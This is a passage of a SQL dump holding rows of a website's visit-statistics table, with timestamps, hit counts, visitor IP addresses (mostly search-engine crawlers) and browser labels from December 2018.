','other'),(350014,1544524169,1,1,0,0,'178.154.244.11','other'),(350015,1544524212,1,1,0,0,'54.36.149.20','other'),(350016,1544524356,1,1,0,0,'54.36.148.223','other'),(350017,1544524369,2,2,0,0,'91.209.11.236','other'),(350018,1544524443,1,1,0,0,'157.55.39.214','other'),(350019,1544524568,1,1,0,0,'66.249.69.144','chrome'),(350020,1544524600,1,1,0,0,'66.249.75.20','chrome'),(350021,1544524623,1,1,0,0,'66.249.69.145','chrome'),(350022,1544524633,1,1,0,0,'66.249.75.21','chrome'),(350023,1544524761,2,2,0,0,'157.55.39.67','other'),(350024,1544524851,1,1,0,0,'54.36.149.65','other'),(350025,1544524871,1,1,0,0,'180.76.15.9','other'),(350026,1544525001,1,1,0,0,'207.46.13.86','other'),(350027,1544525059,1,1,0,0,'66.249.75.17','chrome'),(350028,1544525238,1,1,0,0,'212.129.3.60','firefox'),(350029,1544525307,2,2,0,0,'77.123.54.101','chrome'),(350030,1544525682,1,1,0,0,'66.249.75.22','chrome'),(350031,1544525817,1,1,0,0,'46.229.168.139','other'),(350032,1544525823,1,1,0,0,'46.229.168.144','other'),(350033,1544525891,2,2,0,0,'40.77.167.149','other'),(350034,1544525897,1,1,0,0,'54.36.149.104','other'),(350035,1544525986,2,2,0,0,'91.124.182.170','firefox'),(350036,1544526169,1,1,0,0,'54.36.148.101','other'),(350037,1544526355,3,3,0,0,'195.10.210.49','chrome'),(350038,1544526574,1,1,0,0,'87.250.224.65','other'),(350039,1544526592,2,2,0,0,'178.154.244.11','other'),(350040,1544526870,1,1,0,0,'180.76.15.29','other'),(350041,1544526871,1,1,0,0,'180.76.15.30','other'),(350042,1544526959,1,1,0,0,'46.229.168.154','other'),(350043,1544527029,2,2,0,0,'91.196.178.161','chrome'),(350044,1544527314,1,1,0,0,'91.196.178.129','chrome'),(350045,1544527349,1,1,0,0,'54.36.149.84','other'),(350046,1544527642,2,2,0,0,'5.45.207.79','other'),(350047,1544527726,1,1,0,0,'95.108.213.4','other'),(350048,1544528024,1,1,0,0,'178.94.241.163','chrome'),(350049,1544528756,1,1,0,0,'54.36.148.155','other'),(350050,1544528766,1,1,0,0,'46.229.168.151','other'),(350051,1544529131,1,1,0,0,'46.229.168.139','other'),(350052,1544529719,2,2,0,0,'78.111.185.190','chrome'),(350053,1544529861,2,2,0,0,'91.124.242.238','chrome'),(350054,1544530042,1,1,0,0,'207.46.13.85','other'),(350055,1544530564,2,2,0,0,'93.73.173.105','chrome'),(350056,1544530613,1,1,0,0,'54.36.148.89','other'),(350057,1544530814,2,2,0,0,'91.196.178.77','firefox'),(350058,1544531364,2,2,0,0,'91.196.178.94','chrome'),(350059,1544531791,1,1,0,0,'54.36.149.28','other'),(350060,1544531836,1,1,0,0,'66.249.69.204','chrome'),(350061,1544531839,1,1,0,0,'54.36.148.179','other'),(350062,1544532424,3,3,0,0,'141.8.142.103','other'),(350063,1544532483,1,1,0,0,'46.229.168.147','other'),(350064,1544532574,1,1,0,0,'46.229.168.133','other'),(350065,1544532584,4,4,0,0,'5.45.207.19','other'),(350066,1544532693,1,1,0,0,'87.250.224.65','other'),(350067,1544532722,1,1,0,0,'213.108.43.144','firefox'),(350068,1544532738,1,1,0,0,'54.36.148.197','other'),(350069,1544533061,1,1,0,0,'195.69.177.223','chrome'),(350070,1544533154,2,2,0,0,'207.46.13.85','other'),(350071,1544533391,1,1,0,0,'5.45.207.79','other'),(350072,1544533462,2,2,0,0,'178.154.244.11','other'),(350073,1544533496,2,2,0,0,'95.163.255.95','other'),(350074,1544533887,1,1,0,0,'91.196.178.94','chrome'),(350075,1544534026,2,2,0,0,'5.45.207.19','other'),(350076,1544534312,1,1,0,0,'66.249.75.22','chrome'),(350077,1544534421,1,1,0,0,'54.36.148.184','other'),(350078,1544534434,1,1,0,0,'46.201.169.184','chrome'),(350079,1544534445,1,1,0,0,'66.249.69.221','chrome'),(350080,1544534523,1,1,0,0,'66.249.69.204','chrome'),(350081,1544534621,3,3,0,0,'178.154.244.11','other'),(350082,1544534811,1,1,0,0,'8.29.198.25','other'),(350083,1544534855,1,1,0,0,'8.29.198.27','other'),(350084,1544534902,1,1,0,0,'207.46.13.85','other'),(350085,1544534985,1,1,0,0,'66.249.75.16','chrome'),(350086,1544535033,1,1,0,0,'66.249.75.20','chrome'),(350087,1544535048,3,3,0,0,'5.45.207.79','other'),(350088,1544535075,1,1,0,0,'54.36.148.233','other'),(350089,1544535180,3,3,0,0,'141.8.142.103','other'),(350090,1544535191,1,1,0,0,'87.250.224.65','other'),(350091,1544535202,1,1,0,0,'54.36.148.236','other'),(350092,1544535394,1,1,0,0,'54.36.148.168','other'),(350093,1544535423,1,1,0,0,'207.46.13.99','other'),(350094,1544535543,3,3,0,0,'95.108.213.4','other'),(350095,1544535551,6,6,0,0,'91.209.214.11','other'),(350096,1544535599,3,3,0,0,'178.154.244.11','other'),(350097,1544535642,3,3,0,0,'87.250.224.47','other'),(350098,1544535767,1,1,0,0,'54.36.149.93','other'),(350099,1544536067,2,2,0,0,'207.46.13.38','other'),(350100,1544536245,2,2,0,0,'141.8.142.103','other'),(350101,1544536357,1,1,0,0,'5.45.207.19','other'),(350102,1544536490,1,1,0,0,'46.191.163.196','chrome'),(350103,1544536503,2,2,0,0,'82.207.49.94','chrome'),(350104,1544536563,1,1,0,0,'178.154.244.11','other'),(350105,1544536628,2,2,0,0,'91.196.178.94','chrome'),(350106,1544536724,1,1,0,0,'5.45.207.79','other'),(350107,1544536803,1,1,0,0,'54.36.149.83','other'),(350108,1544536807,1,1,0,0,'54.36.148.123','other'),(350109,1544536988,3,3,0,0,'87.250.224.47','other'),(350110,1544537041,1,1,0,0,'54.36.148.154','other'),(350111,1544537183,1,1,0,0,'95.134.195.106','chrome'),(350112,1544537372,2,2,0,0,'91.196.178.77','firefox'),(350113,1544537691,1,1,0,0,'54.36.148.172','other'),(350114,1544537705,3,3,0,0,'91.196.178.84','chrome'),(350115,1544537766,2,2,0,0,'91.196.178.131','chrome'),(350116,1544537975,1,1,0,0,'207.46.13.193','other'),(350117,1544538196,1,1,0,0,'87.250.224.47','other'),(350118,1544538408,1,1,0,0,'91.196.178.77','firefox'),(350119,1544538729,1,1,0,0,'66.249.66.157','chrome'),(350120,1544538730,1,1,0,0,'66.249.66.154','chrome'),(350121,1544538814,1,1,0,0,'46.229.168.150','other'),(350122,1544539077,1,1,0,0,'194.44.146.42','chrome'),(350123,1544539390,3,3,0,0,'91.196.178.77','firefox'),(350124,1544539718,1,1,0,0,'207.46.13.193','other'),(350125,1544539848,3,3,0,0,'66.249.66.152','chrome'),(350126,1544539938,1,1,0,0,'66.249.66.157','chrome'),(350127,1544540040,1,1,0,0,'66.249.66.155','chrome'),(350128,1544540044,1,1,0,0,'66.249.66.154','chrome'),(350129,1544540335,3,3,0,0,'91.196.178.84','chrome'),(350130,1544540349,1,1,0,0,'54.36.148.26','other'),(350131,1544540359,1,1,0,0,'91.196.178.77','firefox'),(350132,1544540554,1,1,0,0,'91.196.178.94','chrome'),(350133,1544540937,2,2,0,0,'66.249.66.156','chrome'),(350134,1544540960,1,1,0,0,'66.249.66.154','chrome'),(350135,1544541252,1,1,0,0,'54.36.148.69','other'),(350136,1544541388,1,1,0,0,'54.36.148.104','other'),(350137,1544541607,1,1,0,0,'54.36.148.181','other'),(350138,1544541844,1,1,0,0,'46.229.168.143','other'),(350139,1544541879,3,3,0,0,'95.163.255.68','other'),(350140,1544541885,1,1,0,0,'95.163.255.64','other'),(350141,1544542071,1,1,0,0,'54.36.148.219','other'),(350142,1544542191,1,1,0,0,'194.145.215.42','other'),(350143,1544542395,1,1,0,0,'178.154.244.11','other'),(350144,1544542562,1,1,0,0,'178.95.68.232','chrome'),(350145,1544542656,1,1,0,0,'207.46.13.99','other'),(350146,1544542784,2,2,0,0,'91.196.178.94','chrome'),(350147,1544543000,1,1,0,0,'95.134.184.239','firefox'),(350148,1544543238,1,1,0,0,'5.45.207.79','other'),(350149,1544543402,1,1,0,0,'46.229.168.132','other'),(350150,1544543683,1,1,0,0,'54.36.149.67','other'),(350151,1544543710,2,2,0,0,'207.46.13.193','other'),(350152,1544543886,1,1,0,0,'54.36.148.66','other'),(350153,1544544018,1,1,0,0,'185.93.61.2','chrome'),(350154,1544544393,1,1,0,0,'46.229.168.142','other'),(350155,1544544500,1,1,0,0,'87.250.224.65','other'),(350156,1544544511,1,1,0,0,'5.45.207.19','other'),(350157,1544544673,2,2,0,0,'207.46.13.193','other'),(350158,1544544888,1,1,0,0,'46.229.168.149','other'),(350159,1544545004,1,1,0,0,'46.229.168.147','other'),(350160,1544545026,1,1,0,0,'207.46.13.38','other'),(350161,1544545050,1,1,0,0,'66.249.66.152','chrome'),(350162,1544545151,1,1,0,0,'207.46.13.242','other'),(350163,1544545683,1,1,0,0,'8.29.198.25','other'),(350164,1544545717,1,1,0,0,'8.29.198.27','other'),(350165,1544545747,2,2,0,0,'207.46.13.85','other'),(350166,1544546187,1,1,0,0,'54.36.149.85','other'),(350167,1544546653,1,1,0,0,'207.46.13.99','other'),(350168,1544546899,1,1,0,0,'46.229.168.129','other'),(350169,1544546910,1,1,0,0,'46.229.168.133','other'),(350170,1544547268,2,2,0,0,'5.9.73.27','other'),(350171,1544547367,1,1,0,0,'141.8.142.144','other'),(350172,1544547791,1,1,0,0,'207.46.13.193','other'),(350173,1544547958,1,1,0,0,'37.73.245.102','chrome'),(350174,1544548010,1,1,0,0,'46.229.168.145','other'),(350175,1544548377,1,1,0,0,'54.36.148.227','other'),(350176,1544548565,1,1,0,0,'66.249.66.154','chrome'),(350177,1544548858,1,1,0,0,'207.46.13.38','other'),(350178,1544549026,1,1,0,0,'46.229.168.137','other'),(350179,1544549134,1,1,0,0,'54.36.149.3','other'),(350180,1544549184,1,1,0,0,'54.36.148.243','other'),(350181,1544549424,3,3,0,0,'66.249.66.156','chrome'),(350182,1544549426,1,1,0,0,'40.77.167.205','other'),(350183,1544549714,1,1,0,0,'40.77.167.204','other'),(350184,1544549716,1,1,0,0,'66.249.66.155','chrome'),(350185,1544549765,1,1,0,0,'54.36.148.96','other'),(350186,1544549955,1,1,0,0,'54.36.148.79','other'),(350187,1544550169,1,1,0,0,'95.163.255.93','other'),(350188,1544550206,1,1,0,0,'95.163.255.98','other'),(350189,1544550501,12,12,0,0,'23.237.4.26','other'),(350190,1544550686,2,2,0,0,'83.233.207.74','other'),(350191,1544550983,1,1,0,0,'54.36.148.248','other'),(350192,1544550989,1,1,0,0,'94.23.58.212','other'),(350193,1544551003,1,1,0,0,'46.229.168.151','other'),(350194,1544551036,1,1,0,0,'207.46.13.99','other'),(350195,1544551385,1,1,0,0,'54.36.148.163','other'),(350196,1544551408,1,1,0,0,'46.229.168.140','other'),(350197,1544551753,1,1,0,0,'54.36.148.51','other'),(350198,1544551904,1,1,0,0,'91.196.178.129','chrome'),(350199,1544552052,1,1,0,0,'207.46.13.193','other'),(350200,1544552327,2,2,0,0,'66.249.66.152','chrome'),(350201,1544552453,1,1,0,0,'5.45.207.79','other'),(350202,1544552702,1,1,0,0,'54.36.148.184','other'),(350203,1544552837,3,3,0,0,'207.46.13.99','other'),(350204,1544552852,1,1,0,0,'66.249.66.61','chrome'),(350205,1544552853,1,1,0,0,'66.249.66.40','chrome'),(350206,1544552901,1,1,0,0,'46.229.168.145','other'),(350207,1544552906,1,1,0,0,'66.249.66.156','chrome'),(350208,1544552910,1,1,0,0,'46.229.168.153','other'),(350209,1544552913,1,1,0,0,'46.229.168.148','other'),(350210,1544553117,1,1,0,0,'178.154.244.11','other'),(350211,1544553336,1,1,0,0,'46.229.168.141','other'),(350212,1544553698,1,1,0,0,'209.17.96.210','other'),(350213,1544554480,1,1,0,0,'209.17.97.82','other'),(350214,1544554603,1,1,0,0,'66.249.66.155','chrome'),(350215,1544554604,1,1,0,0,'66.249.66.154','chrome'),(350216,1544554682,1,1,0,0,'46.211.82.216','chrome'),(350217,1544554768,2,2,0,0,'91.196.178.134','firefox'),(350218,1544555012,1,1,0,0,'54.36.148.62','other'),(350219,1544556087,1,1,0,0,'46.229.168.154','other'),(350220,1544556328,1,1,0,0,'66.249.66.152','chrome'),(350221,1544556396,3,3,0,0,'5.45.207.19','other'),(350222,1544556454,1,1,0,0,'46.229.168.150','other'),(350223,1544556465,1,1,0,0,'46.229.168.139','other'),(350224,1544556490,1,1,0,0,'46.229.168.153','other'),(350225,1544556496,4,4,0,0,'141.8.142.103','other'),(350226,1544556509,7,7,0,0,'178.154.244.11','other'),(350227,1544556537,2,2,0,0,'37.9.113.103','other'),(350228,1544556547,1,1,0,0,'8.29.198.25','other'),(350229,1544556570,1,1,0,0,'8.29.198.27','other'),(350230,1544556699,1,1,0,0,'37.53.8.48','chrome'),(350231,1544556711,3,3,0,0,'95.108.213.4','other'),(350232,1544556793,2,2,0,0,'5.45.207.79','other'),(350233,1544557275,1,1,0,0,'37.9.113.20','other'),(350234,1544557414,2,2,0,0,'5.45.207.19','other'),(350235,1544557466,1,1,0,0,'157.55.39.198','other'),(350236,1544557533,3,3,0,0,'141.8.142.103','other'),(350237,1544557653,5,5,0,0,'178.154.244.11','other'),(350238,1544557806,8,8,0,0,'5.45.207.79','other'),(350239,1544557993,5,5,0,0,'95.108.213.4','other'),(350240,1544558071,23,23,0,0,'95.216.41.162','other'),(350241,1544558152,1,1,0,0,'37.9.113.148','other'),(350242,1544558199,1,1,0,0,'37.9.113.20','other'),(350243,1544558283,5,5,0,0,'87.250.224.47','other'),(350244,1544558491,7,7,0,0,'141.8.142.103','other'),(350245,1544558550,7,7,0,0,'5.45.207.19','other'),(350246,1544558685,7,7,0,0,'178.154.244.11','other'),(350247,1544558801,2,2,0,0,'66.249.66.155','chrome'),(350249,1544558991,1,1,0,0,'66.249.66.152','chrome'),(350250,1544558999,4,4,0,0,'5.45.207.79','other'),(350251,1544559040,1,1,0,0,'207.46.13.99','other'),(350252,1544559230,1,1,0,0,'66.249.66.61','chrome'),(350253,1544559231,1,1,0,0,'66.249.66.42','chrome'),(350254,1544559236,1,1,0,0,'37.9.113.20','other'),(350255,1544559380,3,3,0,0,'95.108.213.4','other'),(350256,1544559441,2,2,0,0,'159.69.215.40','msie'),(350257,1544559462,2,2,0,0,'141.8.142.103','other'),(350258,1544559669,3,3,0,0,'5.45.207.19','other'),(350259,1544559896,1,1,0,0,'66.249.66.152','chrome'),(350260,1544559925,3,3,0,0,'157.55.39.198','other'),(350261,1544559945,1,1,0,0,'207.46.13.85','other'),(350262,1544560037,1,1,0,0,'207.46.13.193','other'),(350263,1544560068,1,1,0,0,'178.154.244.11','other'),(350264,1544560263,1,1,0,0,'54.36.148.51','other'),(350265,1544560537,1,1,0,0,'46.229.168.135','other'),(350266,1544560540,1,1,0,0,'46.229.168.141','other'),(350267,1544560695,1,1,0,0,'5.45.207.19','other'),(350268,1544560696,2,2,0,0,'141.8.142.103','other'),(350270,1544561047,1,1,0,0,'207.46.13.193','other'),(350271,1544561089,1,1,0,0,'54.36.148.160','other'),(350272,1544561639,2,2,0,0,'52.53.201.78','chrome'),(350273,1544561726,1,1,0,0,'178.154.244.11','other'),(350274,1544561843,1,1,0,0,'46.229.168.133','other'),(350275,1544561938,1,1,0,0,'66.249.66.157','chrome'),(350276,1544561939,1,1,0,0,'66.249.66.156','chrome'),(350277,1544562131,1,1,0,0,'66.249.66.152','chrome'),(350278,1544562201,1,1,0,0,'207.46.13.193','other'),(350279,1544562378,1,0,1,0,'66.249.66.154',''),(350280,1544562515,2,2,0,0,'91.196.178.182','chrome'),(350281,1544562649,1,1,0,0,'95.163.255.94','other'),(350282,1544562654,1,1,0,0,'95.163.255.93','other'),(350283,1544562752,1,1,0,0,'66.249.66.59','chrome'),(350285,1544562786,1,1,0,0,'66.249.66.57','chrome'),(350286,1544562787,2,2,0,0,'66.249.66.40','chrome'),(350287,1544562843,2,2,0,0,'66.249.66.61','chrome'),(350288,1544562844,1,1,0,0,'66.249.66.42','chrome'),(350289,1544563286,1,1,0,0,'54.36.148.178','other'),(350290,1544563361,1,1,0,0,'46.229.168.147','other'),(350291,1544563380,6,6,0,0,'188.166.116.151','msie'),(350292,1544563452,1,1,0,0,'202.198.224.3','other'),(350293,1544563528,1,1,0,0,'5.45.207.79','other'),(350294,1544564555,2,2,0,0,'91.209.11.236','other'),(350295,1544564824,1,1,0,0,'66.249.66.91','chrome'),(350296,1544564879,1,1,0,0,'46.229.168.135','other'),(350297,1544565067,1,1,0,0,'207.46.13.193','other'),(350298,1544565411,4,4,0,0,'207.241.229.51','other'),(350299,1544565530,1,1,0,0,'54.36.149.28','other'),(350300,1544565539,1,1,0,0,'66.249.66.76','chrome'),(350301,1544565554,1,1,0,0,'66.249.66.92','chrome'),(350302,1544565556,1,1,0,0,'54.36.148.240','other'),(350303,1544565841,1,1,0,0,'54.36.149.67','other'),(350304,1544565992,1,1,0,0,'157.55.39.198','other'),(350305,1544566332,1,1,0,0,'66.249.66.157','chrome'),(350306,1544566589,1,1,0,0,'54.36.148.192','other'),(350307,1544567399,1,1,0,0,'46.229.168.153','other'),(350308,1544567402,2,2,0,0,'8.29.198.26','other'),(350309,1544567729,2,2,0,0,'88.230.140.7','other'),(350311,1544567919,1,1,0,0,'66.249.66.156','chrome'),(350312,1544568207,1,1,0,0,'66.249.66.91','chrome'),(350313,1544568272,1,1,0,0,'54.36.149.84','other'),(350314,1544568818,1,1,0,0,'46.229.168.130','other'),(350315,1544568879,2,2,0,0,'46.229.168.154','other'),(350316,1544568909,2,2,0,0,'207.46.13.179','other'),(350317,1544568918,1,1,0,0,'207.46.13.181','other'),(350318,1544569018,1,1,0,0,'207.46.13.180','other'),(350319,1544569043,1,1,0,0,'66.249.66.74','chrome'),(350321,1544569168,1,1,0,0,'66.249.66.156','chrome'),(350322,1544569169,1,1,0,0,'66.249.66.154','chrome'),(350323,1544569485,1,1,0,0,'46.229.168.134','other'),(350324,1544569543,1,1,0,0,'66.249.66.157','chrome'),(350325,1544569571,3,3,0,0,'66.249.66.152','chrome'),(350326,1544570046,1,1,0,0,'46.229.168.146','other'),(350327,1544570165,1,1,0,0,'66.249.66.91','chrome'),(350328,1544570203,1,1,0,0,'207.46.13.180','other'),(350329,1544570367,1,1,0,0,'54.36.149.22','other'),(350330,1544570418,1,1,0,0,'207.46.13.181','other'),(350331,1544570583,1,1,0,0,'54.36.149.102','other'),(350332,1544570675,1,1,0,0,'54.36.149.90','other'),(350333,1544570987,2,2,0,0,'5.58.106.117','firefox'),(350334,1544571036,1,1,0,0,'66.249.66.92','chrome'),(350335,1544571050,1,1,0,0,'46.229.168.140','other'),(350336,1544571109,1,1,0,0,'54.36.148.20','other'),(350337,1544571402,1,1,0,0,'66.249.66.157','chrome'),(350338,1544571403,3,3,0,0,'66.249.66.152','chrome'),(350339,1544571407,2,2,0,0,'66.249.66.155','chrome'),(350340,1544571576,1,1,0,0,'46.229.168.150','other'),(350341,1544571604,2,2,0,0,'95.213.141.126','opera'),(350342,1544571696,1,1,0,0,'107.175.153.245','chrome'),(350343,1544571991,1,1,0,0,'66.249.66.92','chrome'),(350344,1544572096,2,2,0,0,'5.45.207.79','other'),(350345,1544572134,3,3,0,0,'141.8.142.103','other'),(350346,1544572145,1,1,0,0,'66.249.66.154','chrome'),(350347,1544572208,1,1,0,0,'66.249.66.42','chrome'),(350348,1544572209,5,5,0,0,'178.154.244.11','other'),(350349,1544572407,1,1,0,0,'54.36.148.27','other'),(350350,1544572426,2,2,0,0,'5.45.207.19','other'),(350351,1544572439,1,1,0,0,'66.249.66.156','chrome'),(350352,1544572529,1,1,0,0,'87.250.224.47','other'),(350353,1544572782,1,1,0,0,'37.9.113.148','other'),(350354,1544572907,1,1,0,0,'95.108.213.4','other'),(350355,1544573027,2,2,0,0,'5.45.207.79','other'),(350356,1544573080,1,1,0,0,'141.8.142.103','other'),(350357,1544573208,1,1,0,0,'66.249.66.157','chrome'),(350358,1544573209,1,1,0,0,'66.249.66.154','chrome'),(350359,1544573727,2,2,0,0,'46.229.168.133','other'),(350360,1544574067,1,1,0,0,'46.229.168.148','other'),(350361,1544574131,1,1,0,0,'66.249.66.157','chrome'),(350363,1544574157,1,1,0,0,'66.249.66.154','chrome'),(350364,1544574330,1,1,0,0,'66.249.66.40','chrome'),(350365,1544574709,1,1,0,0,'46.229.168.138','other'),(350366,1544574858,1,1,0,0,'46.229.168.149','other'),(350367,1544574861,1,1,0,0,'46.229.168.135','other'),(350368,1544575019,1,1,0,0,'54.36.148.255','other'),(350369,1544575023,1,1,0,0,'46.229.168.137','other'),(350370,1544575026,1,1,0,0,'46.229.168.142','other'),(350371,1544575360,1,1,0,0,'66.249.66.156','chrome'),(350372,1544575362,1,1,0,0,'66.249.66.154','chrome'),(350373,1544575497,1,1,0,0,'207.46.13.180','other'),(350374,1544575874,1,1,0,0,'54.36.148.71','other'),(350375,1544575913,1,1,0,0,'46.229.168.130','other'),(350376,1544576087,1,0,1,0,'66.249.66.155',''),(350377,1544576091,1,0,1,0,'66.249.66.152',''),(350378,1544576242,1,1,0,0,'54.36.149.76','other'),(350379,1544576353,1,1,0,0,'46.229.168.154','other'),(350380,1544576356,1,1,0,0,'46.229.168.134','other'),(350381,1544577564,1,1,0,0,'46.229.168.141','other'),(350382,1544577874,1,1,0,0,'54.36.148.62','other'),(350383,1544578091,1,1,0,0,'66.249.66.42','chrome'),(350384,1544578246,1,1,0,0,'8.29.198.25','other'),(350385,1544578258,1,1,0,0,'8.29.198.26','other'),(350386,1544578450,1,1,0,0,'128.72.155.108','chrome'),(350387,1544578588,2,2,0,0,'66.249.66.152','chrome'),(350388,1544578660,1,1,0,0,'54.36.149.99','other'),(350389,1544578815,1,1,0,0,'54.36.148.228','other'),(350390,1544578828,1,1,0,0,'66.249.66.156','chrome'),(350391,1544579630,1,1,0,0,'207.46.13.182','other'),(350392,1544581686,1,1,0,0,'46.229.168.146','other'),(350393,1544581697,1,1,0,0,'46.229.168.139','other'),(350394,1544581765,1,1,0,0,'207.46.13.179','other'),(350395,1544582183,1,1,0,0,'46.229.168.149','other'),(350396,1544582193,1,1,0,0,'207.46.13.182','other'),(350397,1544582194,1,1,0,0,'46.229.168.150','other'),(350398,1544582431,1,1,0,0,'46.229.168.138','other'),(350399,1544582487,1,1,0,0,'54.36.149.90','other'),(350400,1544582490,1,1,0,0,'46.229.168.141','other'),(350401,1544582501,1,1,0,0,'46.229.168.153','other'),(350402,1544582657,1,1,0,0,'54.36.149.65','other'),(350403,1544582769,1,1,0,0,'54.36.148.109','other'),(350404,1544582846,1,1,0,0,'46.229.168.137','other'),(350405,1544583196,1,1,0,0,'95.163.255.94','other'),(350406,1544583218,1,1,0,0,'207.46.13.180','other'),(350407,1544583246,2,2,0,0,'54.218.156.176','chrome'),(350408,1544584557,1,1,0,0,'46.229.168.143','other'),(350409,1544584570,1,1,0,0,'46.229.168.144','other'),(350410,1544584747,1,1,0,0,'95.163.255.119','other'),(350411,1544584928,1,1,0,0,'95.163.255.108','other'),(350412,1544584980,1,1,0,0,'54.36.148.207','other'),(350413,1544585004,1,1,0,0,'95.163.255.112','other'),(350414,1544585040,1,1,0,0,'95.163.255.176','other'),(350415,1544585043,1,1,0,0,'95.163.255.189','other'),(350416,1544585056,1,1,0,0,'87.250.224.47','other'),(350417,1544585059,1,1,0,0,'95.163.255.118','other'),(350418,1544585101,1,1,0,0,'95.163.255.109','other'),(350419,1544585184,7,7,0,0,'178.154.244.11','other'),(350420,1544585249,2,2,0,0,'95.108.213.4','other'),(350421,1544585290,4,4,0,0,'141.8.142.103','other'),(350422,1544585361,1,1,0,0,'207.46.13.181','other'),(350423,1544585425,6,6,0,0,'5.45.207.79','other'),(350424,1544585471,1,1,0,0,'5.45.207.19','other'),(350425,1544585585,1,1,0,0,'66.249.66.40','chrome'),(350426,1544585616,1,1,0,0,'180.76.15.137','other'),(350427,1544585712,1,1,0,0,'46.229.168.145','other'),(350428,1544585723,1,1,0,0,'46.229.168.146','other'),(350429,1544585815,1,1,0,0,'54.36.148.240','other'),(350430,1544585843,1,1,0,0,'54.36.148.183','other'),(350431,1544586001,1,1,0,0,'66.249.66.156','chrome'),(350432,1544586002,1,1,0,0,'66.249.66.154','chrome'),(350433,1544586311,3,3,0,0,'178.154.244.11','other'),(350434,1544586360,3,3,0,0,'5.45.207.79','other'),(350435,1544586582,1,1,0,0,'141.8.142.103','other'),(350436,1544586628,1,1,0,0,'95.108.213.4','other'),(350437,1544586633,1,1,0,0,'178.154.200.48','other'),(350438,1544587406,1,1,0,0,'5.45.207.79','other'),(350439,1544587433,1,1,0,0,'207.46.13.180','other'),(350440,1544587797,1,1,0,0,'66.249.66.57','chrome'),(350441,1544587798,1,1,0,0,'66.249.66.40','chrome'),(350442,1544587828,1,1,0,0,'54.36.148.116','other'),(350443,1544588079,1,1,0,0,'66.249.66.155','chrome'),(350444,1544588080,2,2,0,0,'66.249.66.152','chrome'),(350445,1544588271,1,1,0,0,'95.163.255.159','other'),(350446,1544588274,1,1,0,0,'95.163.255.179','other'),(350447,1544588364,1,1,0,0,'207.46.13.181','other'),(350448,1544588543,1,1,0,0,'54.36.148.206','other'),(350449,1544588600,1,1,0,0,'66.249.66.156','chrome'),(350450,1544589094,1,1,0,0,'8.29.198.25','other'),(350451,1544589096,1,1,0,0,'8.29.198.26','other'),(350452,1544589554,1,1,0,0,'66.249.66.44','chrome'),(350453,1544589559,1,1,0,0,'66.249.66.155','chrome'),(350455,1544589891,1,1,0,0,'207.46.13.181','other'),(350456,1544590042,1,1,0,0,'46.229.168.146','other'),(350457,1544590153,1,1,0,0,'95.163.255.93','other'),(350458,1544590155,2,2,0,0,'95.163.255.98','other'),(350459,1544590579,1,1,0,0,'95.163.255.99','other'),(350460,1544590581,1,1,0,0,'95.163.255.96','other'),(350461,1544591044,1,1,0,0,'95.163.255.92','other'),(350462,1544592504,1,1,0,0,'54.36.149.39','other'),(350463,1544592742,1,1,0,0,'54.36.148.91','other'),(350464,1544592795,1,1,0,0,'66.249.66.156','chrome'),(350465,1544592796,2,2,0,0,'66.249.66.152','chrome'),(350466,1544592956,1,1,0,0,'54.36.149.102','other'),(350467,1544592960,1,1,0,0,'54.36.148.160','other'),(350468,1544593216,1,1,0,0,'66.249.66.42','chrome'),(350469,1544593251,1,1,0,0,'54.36.149.15','other'),(350470,1544593271,1,1,0,0,'66.249.66.157','chrome'),(350471,1544593272,1,1,0,0,'66.249.66.154','chrome'),(350472,1544593292,1,1,0,0,'46.229.168.142','other'),(350473,1544593659,1,1,0,0,'66.249.66.61','chrome'),(350474,1544593660,1,1,0,0,'66.249.66.44','chrome'),(350475,1544593745,1,1,0,0,'66.249.66.156','chrome'),(350476,1544593746,1,1,0,0,'66.249.66.152','chrome'),(350477,1544593829,1,1,0,0,'66.102.9.38','chrome'),(350479,1544594545,1,1,0,0,'54.36.148.174','other'),(350480,1544594547,1,1,0,0,'207.46.13.179','other'),(350481,1544594813,1,1,0,0,'54.36.149.61','other'),(350482,1544594893,1,1,0,0,'66.249.66.155','chrome'),(350483,1544594894,2,2,0,0,'66.249.66.156','chrome'),(350484,1544595051,1,1,0,0,'66.249.66.154','chrome'),(350485,1544595181,1,1,0,0,'194.228.13.163','chrome'),(350486,1544595352,59,59,0,0,'192.151.145.178','other'),(350487,1544595772,1,1,0,0,'66.249.66.152','chrome'),(350488,1544595992,1,1,0,0,'95.163.255.92','other'),(350489,1544595995,1,1,0,0,'95.163.255.99','other'),(350490,1544596042,2,2,0,0,'91.196.178.72','firefox'),(350491,1544596148,1,1,0,0,'95.163.255.169','other'),(350492,1544596150,1,1,0,0,'95.163.255.175','other'),(350493,1544597151,1,1,0,0,'91.196.178.72','firefox'),(350494,1544597285,5,5,0,0,'141.8.142.103','other'),(350495,1544597389,1,1,0,0,'178.154.200.48','other'),(350496,1544597390,1,1,0,0,'178.154.244.49','other'),(350497,1544597392,5,5,0,0,'178.154.244.11','other'),(350498,1544597524,1,1,0,0,'207.46.13.242','other'),(350499,1544597584,4,4,0,0,'207.46.13.180','other'),(350500,1544597811,1,1,0,0,'141.8.142.108','other'),(350501,1544597854,1,1,0,0,'5.45.207.19','other'),(350502,1544597919,1,1,0,0,'87.250.224.47','other'),(350503,1544597922,1,1,0,0,'37.9.113.20','other'),(350504,1544597940,1,1,0,0,'178.154.171.24','other'),(350505,1544598069,1,1,0,0,'54.36.149.107','other'),(350506,1544598131,7,7,0,0,'5.45.207.79','other'),(350507,1544598194,1,1,0,0,'46.229.168.140','other'),(350508,1544598390,3,3,0,0,'178.154.244.11','other'),(350509,1544598420,2,2,0,0,'141.8.142.103','other'),(350510,1544598636,1,1,0,0,'95.163.255.102','other'),(350511,1544598684,1,1,0,0,'95.163.255.116','other'),(350512,1544598737,1,1,0,0,'54.36.149.16','other'),(350513,1544599013,1,1,0,0,'54.36.148.100','other'),(350514,1544599046,1,1,0,0,'66.249.66.156','chrome'),(350515,1544599047,1,1,0,0,'66.249.66.154','chrome'),(350516,1544599217,1,1,0,0,'37.9.113.148','other'),(350517,1544599227,2,2,0,0,'207.46.13.182','other'),(350518,1544599274,1,1,0,0,'87.250.224.47','other'),(350519,1544599277,2,2,0,0,'91.196.178.72','firefox'),(350520,1544599290,1,1,0,0,'91.236.184.19','chrome'),(350522,1544599334,1,1,0,0,'207.46.13.179','other'),(350523,1544599391,2,2,0,0,'141.8.142.103','other'),(350524,1544599684,1,1,0,0,'46.229.168.135','other'),(350525,1544599936,1,1,0,0,'8.29.198.26','other'),(350526,1544599940,1,1,0,0,'8.29.198.27','other'),(350527,1544600044,1,1,0,0,'62.205.134.182','msie'),(350528,1544601105,1,1,0,0,'46.229.168.132','other'),(350529,1544601173,2,2,0,0,'66.249.66